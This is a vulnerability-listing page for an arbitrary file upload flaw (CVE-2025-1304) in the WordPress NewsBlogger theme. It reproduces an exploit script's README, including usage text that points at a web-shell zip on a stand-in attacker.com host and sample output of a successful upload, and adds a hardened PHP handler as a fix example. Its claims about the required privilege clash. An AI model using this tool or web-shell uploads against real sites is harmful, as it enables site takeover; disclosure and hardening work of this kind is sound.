Related vulnerability
Title:
WordPress plugin NewsBlogger security vulnerability
(CVE-2025-1304)
Description: WordPress and WordPress plugin are products of the WordPress Foundation. WordPress is a blog platform developed in PHP; it supports hosting personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin NewsBlogger versions 0.2.5.1 and earlier contain a security vulnerability that stems from a missing capability check and may lead to arbitrary file upload.
Description
WordPress NewsBlogger Theme <= 0.2.5.1 is vulnerable to Arbitrary File Upload
Introduction
# 🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - Arbitrary File Upload (CVE-2025-1304)
**CVSS Score:** 8.8 (High)
**Vulnerability Type:** Arbitrary File Upload
**Component:** WordPress Theme
**CVE ID:** CVE-2025-1304
---
## 🔥 Vulnerability Overview
The `NewsBlogger` WordPress theme (versions <= 0.2.5.1) is vulnerable to an **Arbitrary File Upload** via the admin welcome panel.
This vulnerability allows any authenticated user — including those with the minimal **Subscriber** role — to upload a malicious `.zip` archive containing a web shell.
The upload occurs through an unvalidated plugin URL field, which fails to properly verify the content or type of the uploaded file.
A successful attack could lead to full compromise of the website, including remote command execution and privilege escalation.
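The root cause the advisory names is a missing capability check on an admin-ajax handler that accepts a plugin URL. The following is an added example, not the NewsBlogger theme's own code and not the fix the vendor shipped: a hardened "install plugin from URL" AJAX handler as a theme or plugin author would write it, with the checks whose absence is described above. The hook name `wp_ajax_example_install_plugin_from_url`, the nonce action `example_welcome_nonce`, the `plugin_url` field, the `example-welcome` page slug and the allow-listed host are all assumptions.

```php
<?php
/**
 * Added example (hypothetical names): a hardened admin-ajax handler for
 * installing a plugin from a URL. Each numbered step is one of the controls
 * the advisory above says was missing or insufficient.
 */

add_action( 'wp_ajax_example_install_plugin_from_url', 'example_install_plugin_from_url' );

function example_install_plugin_from_url() {
    // 1. CSRF protection: the request must carry the nonce printed on the welcome page.
    //    check_ajax_referer() dies with a 403 when the nonce is missing or stale.
    check_ajax_referer( 'example_welcome_nonce', 'nonce' );

    // 2. Capability check: being logged in is not enough. A Subscriber does not
    //    hold install_plugins, so the request is rejected here.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input validation: the URL must be https and point at an allow-listed host,
    //    so an arbitrary remote archive cannot be pulled in.
    $url = isset( $_POST['plugin_url'] ) ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) ) : '';
    if ( ! example_is_allowed_plugin_url( $url ) ) {
        wp_send_json_error( array( 'message' => 'Plugin URL not permitted.' ), 400 );
    }

    // 4. Use the core upgrader instead of a hand-rolled download-and-unzip, so
    //    package handling and filesystem access follow WordPress' own rules.
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $url );

    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    wp_send_json_success(
        array( 'redirect_url' => admin_url( 'admin.php?page=example-welcome' ) )
    );
}

/**
 * Allow-list check for the plugin URL. The trusted host list is an assumption
 * for this example; a real theme would list the hosts it actually ships from.
 */
function example_is_allowed_plugin_url( $url ) {
    if ( '' === $url ) {
        return false;
    }
    $parts = wp_parse_url( $url );
    if ( empty( $parts['scheme'] ) || 'https' !== strtolower( $parts['scheme'] ) ) {
        return false;
    }
    $allowed_hosts = array( 'downloads.wordpress.org' );
    return ! empty( $parts['host'] )
        && in_array( strtolower( $parts['host'] ), $allowed_hosts, true );
}
```

The order matters: the nonce check only proves the request came from a page the same user loaded, so it does nothing against a low-privilege account acting on its own behalf; the `current_user_can( 'install_plugins' )` test is the control that actually closes the gap described in this advisory, and the URL allow-list limits what even an authorized administrator can pull in.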
---
## 🧠 Script Details
This Python script automates the exploitation of the vulnerability by:
- Logging in using supplied admin credentials.
- Extracting the `nonce` dynamically from the vulnerable welcome page.
- Uploading a remote malicious plugin via the vulnerable AJAX endpoint.
---
## ⚙️ Usage Instructions
```bash
python CVE-2025-1304.py -h
```
```text
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
```
---
## 📤 Example Output
```text
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
```
---
## ⚠️ Disclaimer
This code is provided for **educational and authorized security testing** purposes only.
The author assumes no responsibility for any misuse or damage caused by this tool.
---
*By: Nxploited ( Khaled Alenazi)*
File snapshot
[4.0K] /data/pocs/e510112dff126fe49cc5398477070cf7769a380f
├── [2.8K] CVE-2025-1304.py
├── [1.1K] LICENSE
├── [2.4K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.